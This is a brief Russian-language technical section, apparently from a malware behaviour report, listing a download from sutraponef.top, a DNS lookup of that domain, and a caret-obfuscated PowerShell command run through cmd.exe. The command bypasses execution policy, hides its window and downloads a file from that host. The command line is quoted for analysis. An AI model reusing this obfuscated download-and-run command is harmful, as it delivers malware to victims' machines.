Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^E^RsHel^L.e^X^E^ ^-eX^e^c^ution^p^o^licY Bypa^ss^ -NO^pRo^F^i^lE -wI^ndo^WStyl^e ^hiD^De^n^ ^(n^e^w-oB^j^ECT sYSTem.nE^t.^we^bcLiEN^T).DoWNloa^df^ilE^('http://sutraponef.top...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pOw^E^RsHel^L.e^X^E^ ^-eX^e^c^ution^p^o^licY Bypa^ss^ -NO^pRo^F^i^lE -wI^ndo^WStyl^e ^hiD^De^n^ ^(n^e^w-oB^j^ECT sYSTem.nE^t.^we^bcLiEN^T).DoWNloa^df^ilE^('http://sutraponef.top...' (со скрытым окном)